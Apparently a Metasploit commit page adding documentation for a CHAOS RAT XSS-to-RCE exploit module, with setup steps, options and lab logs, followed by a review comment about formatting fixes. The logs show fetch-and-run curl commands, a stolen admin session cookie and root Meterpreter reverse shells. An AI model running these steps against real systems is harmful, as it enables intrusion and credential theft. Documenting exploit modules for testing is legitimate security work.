Commit 67154a1

Land rapid7#19104, CHAOS rat xss to rce
2 parents 6301d84 + d1739f3 commit 67154a1

File tree

2 files changed

+685
-0
lines changed

Lines changed: 267 additions & 0 deletions
@@ -0,0 +1,267 @@
1+
## Vulnerable Application
2+
3+
CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
4+
allows generated binaries to control remote operating systems. The
5+
webapp contains a remote command execution vulnerability which
6+
can be triggered by an authenticated user when generating a new
7+
executable. The webapp also contains an XSS vulnerability within
8+
the view of a returned command being executed on an agent.
9+
10+
Execution can happen through one of three routes:
11+
12+
1. Provided credentials can be used to execute the RCE directly
13+
2. A `JWT` token from an agent can be provided to emulate a compromised
14+
host. If a logged in user attempts to execute a command on the host
15+
the returned value contains an xss payload.
16+
3. Similar to technique 2, an agent executable can be provided and the
17+
`JWT` token can be extracted.
18+
19+
Verified against CHAOS `7d5b20ad7e58e5b525abdcb3a12514b88e87cef2` running
20+
in a docker container.
21+
22+
### Install
23+
24+
Docker image: `docker run -it -v ~/chaos-container:/database/ -v ~/chaos-container:/temp/ -e PORT=8080 -e SQLITE_DATABASE=chaos -p 8080:8080 tiagorlampert/chaos:latest`
25+
26+
To generate an agent, login (`admin`:`admin`). Click the triple lines
27+
to expand the menu, select `Manage`, `Generate Client`. Click `Build`.
28+
29+
## Verification Steps
30+
31+
1. Install the application or run the docker image
32+
1. Start msfconsole
33+
1. Do: `use exploit/linux/http/chaos_rat_xss_to_rce`
34+
1. Do: `set rhost [ip]`
35+
1. Pick a method:
36+
1. `set username [username]`, `set password [password]`
37+
2. `set jwt [jwt token]`
38+
3. `set agent [path to agent]`
39+
1. Do: `run`
40+
1. You should get a shell. Interaction by a CHAOS admin may be required
41+
42+
## Options
43+
44+
### USERNAME
45+
46+
User to login with, default for CHAOS is `admin`.
47+
48+
### PASSWORD
49+
50+
Password to login with, default for CHAOS is `admin`.
51+
52+
### JWT
53+
54+
JWT token from an agent. Used to emulate a compromised
55+
host.
56+
57+
### AGENT
58+
59+
The path to an agent executable generated by CHAOS. Used to emulate a compromised host.
60+
61+
## Advanced Options
62+
63+
### AGENT_HOSTNAME
64+
65+
Hostname for a fake agent. Defaults to `DC01`.
66+
67+
### AGENT_USERNAME
68+
69+
Username for a fake agent. Defaults to `Administrator`.
70+
71+
### AGENT_USERID
72+
73+
User ID for a fake agent. Defaults to `Administrator`.
74+
75+
### AGENT_OS
76+
77+
OS for a fake agent. Choices are `Windows`, or `Linux`.
78+
Defaults to `Windows`.
79+
80+
## Scenarios
81+
82+
### Docker Image
83+
84+
#### Agent Method
85+
86+
```
87+
[*] Processing chaos.rb for ERB directives.
88+
resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
89+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
90+
resource (chaos.rb)> set rhosts 127.0.0.1
91+
rhosts => 127.0.0.1
92+
resource (chaos.rb)> set FETCH_SRVPORT 9090
93+
FETCH_SRVPORT => 9090
94+
resource (chaos.rb)> set agent malware2.exe
95+
agent => malware2.exe
96+
resource (chaos.rb)> set SRVHOST 111.111.10.147
97+
SRVHOST => 111.111.10.147
98+
resource (chaos.rb)> set SRVPORT 8888
99+
SRVPORT => 8888
100+
resource (chaos.rb)> set verbose true
101+
verbose => true
102+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
103+
104+
[*] Command to run on remote host: curl -so ./SPSVaaJxd http://111.111.10.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./SPSVaaJxd; ./SPSVaaJxd &
105+
[*] Exploit running as background job 0.
106+
[*] Exploit completed, but no session was created.
107+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
108+
[*] Fetch handler listening on 111.111.10.147:9090
109+
[*] HTTP server started
110+
[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
111+
[*] Started reverse TCP handler on 111.111.10.147:4444
112+
[*] Running automatic check ("set AutoCheck false" to disable)
113+
[!] The service is running, but could not be validated. Chaos application found
114+
[*] Attempting exploitation through Agent
115+
[*] Server address: 172.17.0.2
116+
[*] Server port: 8080
117+
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDQ4MDY5MzgsInVzZXIiOiJkZWZhdWx0In0.3zlOZ8RI_YdDqEgNbt20oL7R30Ry5JgwJVCEqx0WSUA
118+
[*] Fake MAC for agent: f8:16:5a:23:5b:74
119+
[*] Listening for XSS response on: http://111.111.10.147:8888/
120+
[*] Performing Callback Checkin
121+
[*] WebSocket connecting to receive commands
122+
[*] Performing Callback Checkin
123+
```
124+
125+
Log in to the website, click `Acion`, `Remote Shell` on the
126+
fake agent we've added to the list. Now type anything into
127+
the input box and click `Send`.
128+
129+
```
130+
[+] Received agent command 'id', sending XSS in return
131+
[*] Received GET request.
132+
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
133+
[+] Detected Agents
134+
Live Agents
135+
===========
136+
137+
IP OS Username Hostname MAC
138+
-- -- -------- -------- ---
139+
111.111.1 Windows Administra DC01 86:89:42:d1:dc
140+
1.147 tor (Admin :a7
141+
istrator)
142+
111.111.1 Windows Administra DC01 f8:16:5a:23:5b
143+
1.147 tor (Admin :74
144+
istrator)
145+
146+
[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
147+
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
148+
[*] Transmitting intermediate stager...(126 bytes)
149+
[*] Sending stage (3045380 bytes) to 172.17.0.2
150+
[*] Meterpreter session 1 opened (111.111.10.147:4444 -> 172.17.0.2:41290) at 2024-04-17 15:19:22 +0000
151+
152+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > sessions -i 1
153+
[*] Starting interaction with 1...
154+
155+
meterpreter > getuid
156+
Server username: root
157+
meterpreter > sysinfo
158+
Computer : 172.17.0.2
159+
OS : Debian 11.4 (Linux 5.19.0-43-generic)
160+
Architecture : x64
161+
BuildTuple : x86_64-linux-musl
162+
Meterpreter : x64/linux
163+
meterpreter >
164+
```
165+
166+
#### JWT Method
167+
168+
```
169+
[*] Processing chaos.rb for ERB directives.
170+
resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
171+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
172+
resource (chaos.rb)> set rhosts 127.0.0.1
173+
rhosts => 127.0.0.1
174+
resource (chaos.rb)> set FETCH_SRVPORT 9090
175+
FETCH_SRVPORT => 9090
176+
resource (chaos.rb)> set jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
177+
jwt => eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
178+
resource (chaos.rb)> set SRVHOST 111.111.63.147
179+
SRVHOST => 111.111.63.147
180+
resource (chaos.rb)> set SRVPORT 8888
181+
SRVPORT => 8888
182+
resource (chaos.rb)> set verbose true
183+
verbose => true
184+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
185+
186+
[*] Command to run on remote host: curl -so ./HVHYAPykfOV http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./HVHYAPykfOV; ./HVHYAPykfOV &
187+
[*] Exploit running as background job 0.
188+
[*] Exploit completed, but no session was created.
189+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
190+
[*] Fetch handler listening on 111.111.63.147:9090
191+
[*] HTTP server started
192+
[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
193+
[*] Started reverse TCP handler on 111.111.63.147:4444
194+
[*] Running automatic check ("set AutoCheck false" to disable)
195+
[!] The service is running, but could not be validated. Chaos application found
196+
[*] Attempting exploitation through JWT token
197+
[*] Fake MAC for agent: d9:74:62:8e:fc:43
198+
[*] Listening for XSS response on: http://111.111.63.147:8888/
199+
[*] Performing Callback Checkin
200+
[*] WebSocket connecting to receive commands
201+
```
202+
203+
Log in to the website, click `Acion`, `Remote Shell` on the
204+
fake agent we've added to the list. Now type anything into
205+
the input box and click `Send`.
206+
207+
```
208+
[+] Received agent command 'whoami', sending XSS in return
209+
[*] Received GET request.
210+
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzEwMTAsIm9yaWdfaWF0IjoxNzEzMzY3NDEwLCJ1c2VyIjoiYWRtaW4ifQ.K-DCy8qNaxAHVx2Hu_Z-Ff7ZEG_TWkaount8wEM0clk
211+
[+] Detected Agents
212+
Live Agents
213+
===========
214+
215+
IP OS Username Hostname MAC
216+
-- -- -------- -------- ---
217+
111.111.63 Windows Administrat DC01 d9:74:62:8e:fc
218+
.147 or (Adminis :43
219+
trator)
220+
221+
[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
222+
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
223+
[*] Transmitting intermediate stager...(126 bytes)
224+
[*] Sending stage (3045380 bytes) to 172.17.0.2
225+
[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:55572) at 2024-04-17 15:32:59 +0000
226+
```
227+
228+
### Credentialed Method
229+
230+
```
231+
[*] Processing chaos.rb for ERB directives.
232+
resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
233+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
234+
resource (chaos.rb)> set rhosts 127.0.0.1
235+
rhosts => 127.0.0.1
236+
resource (chaos.rb)> set FETCH_SRVPORT 9090
237+
FETCH_SRVPORT => 9090
238+
resource (chaos.rb)> set username admin
239+
username => admin
240+
resource (chaos.rb)> set password admin
241+
password => admin
242+
resource (chaos.rb)> set SRVHOST 111.111.63.147
243+
SRVHOST => 111.111.63.147
244+
resource (chaos.rb)> set SRVPORT 8888
245+
SRVPORT => 8888
246+
resource (chaos.rb)> set verbose true
247+
verbose => true
248+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
249+
250+
[*] Command to run on remote host: curl -so ./FdfcLgdHSudl http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./FdfcLgdHSudl; ./FdfcLgdHSudl &
251+
[*] Exploit running as background job 0.
252+
[*] Exploit completed, but no session was created.
253+
msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
254+
[*] Fetch handler listening on 111.111.63.147:9090
255+
[*] HTTP server started
256+
[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
257+
[*] Started reverse TCP handler on 111.111.63.147:4444
258+
[*] Running automatic check ("set AutoCheck false" to disable)
259+
[!] The service is running, but could not be validated. Chaos application found
260+
[*] Attempting exploitation through direct login
261+
[*] Attempting login
262+
[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
263+
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
264+
[*] Transmitting intermediate stager...(126 bytes)
265+
[*] Sending stage (3045380 bytes) to 172.17.0.2
266+
[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:59770) at 2024-04-17 15:40:11 +0000
267+
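Review bot: The `### Credentialed Method` scenario block at the end of the hunk is never closed: the last visible content line is the `[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:59770) ...` line and no closing ``` fence follows it before the file ends, so in the rendered document the code block runs off the end of the page; add the closing fence after that line. That heading is also one level shallower than its siblings (`#### Agent Method` and `#### JWT Method` sit under `### Docker Image`), so either change it to `#### Credentialed Method` if it is also a Docker scenario, or add a short line stating which setup it was run against. Finally, both "Log in to the website, click `Acion`, `Remote Shell` on the fake agent" paragraphs misspell the menu item; it should read `Action`.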